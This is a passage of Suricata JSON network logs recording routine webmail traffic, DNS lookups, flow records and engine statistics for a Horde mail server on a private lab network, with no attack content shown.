Gecko\/20100101 
Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":34}} {"timestamp":"2020-02-29T00:07:30.268255+0000","flow_id":1337983970224512,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52698,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=t178Jy_bOFAgZYI5pak0cNw&app=mnemo&imple=Mnemo_Ajax_Imple_TagAutoCompleter&input=memo_tags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":34},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/horde\/imple","state":"CLOSED","stored":false,"size":16,"tx_id":0}} {"timestamp":"2020-02-29T00:07:32.000140+0000","flow_id":893085479963979,"event_type":"flow","src_ip":"192.168.10.130","src_port":34744,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":18,"pkts_toclient":28,"bytes_toserver":3250,"bytes_toclient":28563,"start":"2020-02-29T00:05:29.625995+0000","end":"2020-02-29T00:06:30.686607+0000","age":61,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} 
{"timestamp":"2020-02-29T00:07:32.000396+0000","flow_id":263627957994143,"event_type":"flow","src_ip":"192.168.10.130","src_port":34746,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":7,"pkts_toclient":6,"bytes_toserver":1276,"bytes_toclient":956,"start":"2020-02-29T00:05:30.656031+0000","end":"2020-02-29T00:06:30.686645+0000","age":60,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:07:34.388868+0000","flow_id":1337983970224512,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52698,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=t178Jy_bOFAgZYI5pak0cNw&app=mnemo&imple=Mnemo_Ajax_Imple_TagAutoCompleter&input=memo_tags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":34},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/horde\/imple","state":"CLOSED","stored":false,"size":14,"tx_id":0}} {"timestamp":"2020-02-29T00:07:34.399804+0000","flow_id":23852826892732,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":43605,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":49607,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:07:34.508268+0000","flow_id":23852826892732,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":43605,"proto":"UDP","dns":{"type":"answer","id":49607,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} 
{"timestamp":"2020-02-29T00:07:34.508268+0000","flow_id":23852826892732,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":43605,"proto":"UDP","dns":{"type":"answer","id":49607,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:07:34.638156+0000","flow_id":1337983970224512,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52698,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/memo.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":302,"redirect":"http:\/\/mail.spiral.com\/mnemo\/list.php","length":20}} {"timestamp":"2020-02-29T00:07:34.638156+0000","flow_id":1337983970224512,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52698,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/memo.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":302,"redirect":"http:\/\/mail.spiral.com\/mnemo\/list.php","length":20},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/memo.php","state":"CLOSED","stored":false,"size":199,"tx_id":1}} {"timestamp":"2020-02-29T00:07:34.656889+0000","flow_id":746339340518905,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":54527,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":33582,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} 
{"timestamp":"2020-02-29T00:07:34.764835+0000","flow_id":746339340518905,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":54527,"proto":"UDP","dns":{"type":"answer","id":33582,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:07:34.764835+0000","flow_id":746339340518905,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":54527,"proto":"UDP","dns":{"type":"answer","id":33582,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:07:34.862566+0000","flow_id":1337983970224512,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52698,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/list.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5486}} 
{"timestamp":"2020-02-29T00:07:35.000218+0000","event_type":"stats","stats":{"uptime":14107,"capture":{"kernel_packets":133828,"kernel_drops":0},"decoder":{"pkts":133831,"bytes":92550250,"invalid":183,"ipv4":132372,"ipv6":8,"ethernet":133831,"raw":0,"null":0,"sll":0,"tcp":127240,"udp":4934,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":691,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7096192},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2715,"ssn_memcap_drop":0,"pseudo":340,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2731,"synack":2722,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":140,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1758,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2251,"failed_udp":110},"tx":{"http":4547,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2328}},"flow_mgr":{"closed_pruned":2696,"new_pruned":15,"est_pruned":2298,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":1,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":21166,"memcap_state":0,"memcap_global":0},"http":{"memuse":53880,"memcap":0}}} 
{"timestamp":"2020-02-29T00:07:35.005162+0000","flow_id":17002334350197,"event_type":"flow","src_ip":"192.168.10.122","src_port":35837,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:02:33.551797+0000","end":"2020-02-29T00:02:33.658408+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:07:39.863240+0000","flow_id":1337983970224512,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52698,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/list.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5486},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/list.php","state":"CLOSED","stored":false,"size":27327,"tx_id":2}} {"timestamp":"2020-02-29T00:07:40.000714+0000","flow_id":1521357579846265,"event_type":"flow","src_ip":"192.168.10.122","src_port":39579,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:02:39.033401+0000","end":"2020-02-29T00:02:39.144484+0000","age":0,"state":"established","reason":"timeout","alerted":false}} 
{"timestamp":"2020-02-29T00:07:42.000516+0000","flow_id":926165322136906,"event_type":"flow","src_ip":"192.168.10.81","src_port":52692,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":11,"pkts_toclient":10,"bytes_toserver":1219,"bytes_toclient":8809,"start":"2020-02-29T00:06:31.425290+0000","end":"2020-02-29T00:06:41.624893+0000","age":10,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:07:42.000731+0000","flow_id":384282168206084,"event_type":"flow","src_ip":"192.168.10.122","src_port":42164,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:02:41.140036+0000","end":"2020-02-29T00:02:41.244983+0000","age":0,"state":"established","reason":"timeout","alerted":false}} 
{"timestamp":"2020-02-29T00:07:43.000189+0000","event_type":"stats","stats":{"uptime":14115,"capture":{"kernel_packets":133852,"kernel_drops":0},"decoder":{"pkts":133853,"bytes":92559420,"invalid":183,"ipv4":132392,"ipv6":8,"ethernet":133853,"raw":0,"null":0,"sll":0,"tcp":127256,"udp":4938,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":691,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7096192},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2715,"ssn_memcap_drop":0,"pseudo":340,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2731,"synack":2722,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":140,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1758,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2253,"failed_udp":110},"tx":{"http":4549,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2330}},"flow_mgr":{"closed_pruned":2696,"new_pruned":15,"est_pruned":2300,"bypassed_pruned":0,"flows_checked":2,"flows_notimeout":2,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65533,"rows_empty":1,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":20173,"memcap_state":0,"memcap_global":0},"http":{"memuse":2032,"memcap":0}}} 
{"timestamp":"2020-02-29T00:07:43.001397+0000","flow_id":542306914958372,"event_type":"flow","src_ip":"192.168.10.130","src_port":34748,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":6,"pkts_toclient":5,"bytes_toserver":1095,"bytes_toclient":725,"start":"2020-02-29T00:06:30.687140+0000","end":"2020-02-29T00:06:42.570839+0000","age":12,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:07:43.818348+0000","flow_id":2246425387862493,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":49223,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":31542,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":1}} {"timestamp":"2020-02-29T00:07:43.926789+0000","flow_id":2246425387862493,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":49223,"proto":"UDP","dns":{"type":"answer","id":31542,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:07:43.926789+0000","flow_id":2246425387862493,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":49223,"proto":"UDP","dns":{"type":"answer","id":31542,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:07:44.000900+0000","flow_id":1825376840178270,"event_type":"flow","src_ip":"192.168.10.122","src_port":123,"dest_ip":"158.69.60.196","dest_port":123,"proto":"UDP","app_proto":"failed","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":90,"bytes_toclient":90,"start":"2020-02-29T00:02:43.449118+0000","end":"2020-02-29T00:02:43.556107+0000","age":0,"state":"established","reason":"timeout","alerted":false}} 
{"timestamp":"2020-02-29T00:07:44.089851+0000","flow_id":2004988097150431,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34760,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/turba\/contact.php?source=dDQI2mfGX-cQemxh4GC5uHK&key=E4CyMdGf1_ahUkbupqNOwDc&view=Contact","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6933}} {"timestamp":"2020-02-29T00:07:46.417076+0000","flow_id":360397875076404,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":46500,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":63556,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:07:46.525040+0000","flow_id":360397875076404,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":46500,"proto":"UDP","dns":{"type":"answer","id":63556,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:07:46.525040+0000","flow_id":360397875076404,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":46500,"proto":"UDP","dns":{"type":"answer","id":63556,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:07:46.658213+0000","flow_id":642560046543245,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34762,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6136}} {"timestamp":"2020-02-29T00:07:47.000342+0000","flow_id":28091940766251,"event_type":"flow","src_ip":"192.168.10.122","src_port":43799,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:02:46.754219+0000","end":"2020-02-29T00:02:46.861282+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:07:47.001038+0000","flow_id":2218946168519686,"event_type":"flow","src_ip":"192.168.10.122","src_port":33488,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:02:46.228358+0000","end":"2020-02-29T00:02:46.339559+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:07:48.000525+0000","flow_id":1874300828193260,"event_type":"flow","src_ip":"192.168.10.81","src_port":52694,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":8,"pkts_toclient":8,"bytes_toserver":1013,"bytes_toclient":6180,"start":"2020-02-29T00:06:41.856556+0000","end":"2020-02-29T00:06:47.067758+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} 
{"timestamp":"2020-02-29T00:07:48.000794+0000","flow_id":206771170309255,"event_type":"flow","src_ip":"192.168.10.122","src_port":39566,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:02:47.390279+0000","end":"2020-02-29T00:02:47.501100+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:07:48.000908+0000","flow_id":406165026970995,"event_type":"flow","src_ip":"192.168.10.122","src_port":33988,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:02:47.204147+0000","end":"2020-02-29T00:02:47.309811+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:07:48.000998+0000","flow_id":979672010002716,"event_type":"flow","src_ip":"192.168.10.122","src_port":36753,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:02:47.528668+0000","end":"2020-02-29T00:02:47.634105+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:07:48.966645+0000","flow_id":2004988097150431,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34760,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 
Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/turba\/contact.php?source=dDQI2mfGX-cQemxh4GC5uHK&key=E4CyMdGf1_ahUkbupqNOwDc&view=Contact","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6933},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":35877,"tx_id":0}} {"timestamp":"2020-02-29T00:07:48.976304+0000","flow_id":1914802374239664,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":51696,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":47241,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:07:49.000515+0000","flow_id":2186244303009272,"event_type":"flow","src_ip":"192.168.10.130","src_port":34750,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":10,"pkts_toclient":10,"bytes_toserver":1225,"bytes_toclient":7931,"start":"2020-02-29T00:06:42.570872+0000","end":"2020-02-29T00:06:48.567753+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:07:49.084348+0000","flow_id":1914802374239664,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":51696,"proto":"UDP","dns":{"type":"answer","id":47241,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:07:49.084348+0000","flow_id":1914802374239664,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":51696,"proto":"UDP","dns":{"type":"answer","id":47241,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} 
{"timestamp":"2020-02-29T00:07:49.166484+0000","flow_id":2004988097150431,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34760,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/nag\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7998}} {"timestamp":"2020-02-29T00:07:50.000246+0000","event_type":"stats","stats":{"uptime":14122,"capture":{"kernel_packets":133873,"kernel_drops":0},"decoder":{"pkts":133891,"bytes":92577100,"invalid":183,"ipv4":132430,"ipv6":8,"ethernet":133891,"raw":0,"null":0,"sll":0,"tcp":127290,"udp":4942,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":691,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10002,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7094464},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2717,"ssn_memcap_drop":0,"pseudo":341,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2733,"synack":2724,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":140,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1760,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2254,"failed_udp":110},"tx":{"http":4551,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2332}},"flow_mgr":{"closed_pruned":2698,"new
_pruned":15,"est_pruned":2304,"bypassed_pruned":0,"flows_checked":8,"flows_notimeout":6,"flows_timeout":2,"flows_timeout_inuse":0,"flows_removed":2,"rows_checked":65536,"rows_skipped":65528,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":19181,"memcap_state":0,"memcap_global":0},"http":{"memuse":105545,"memcap":0}}} {"timestamp":"2020-02-29T00:07:51.409000+0000","flow_id":642560046543245,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34762,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6136},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":30699,"tx_id":0}} {"timestamp":"2020-02-29T00:07:51.417961+0000","flow_id":872744524144809,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":40322,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":32979,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:07:51.525948+0000","flow_id":872744524144809,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":40322,"proto":"UDP","dns":{"type":"answer","id":32979,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:07:51.525948+0000","flow_id":872744524144809,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":40322,"proto":"UDP","dns":{"type":"answer","id":32979,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} 
{"timestamp":"2020-02-29T00:07:51.606717+0000","flow_id":642560046543245,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34762,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/imp\/dynamic.php?page=mailbox","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8383}} {"timestamp":"2020-02-29T00:07:51.897720+0000","flow_id":642560046543245,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34762,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/dynamic.php?page=mailbox","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8383},"app_proto":"http","fileinfo":{"filename":"\/imp\/dynamic.php","state":"CLOSED","stored":false,"size":35098,"tx_id":1}} 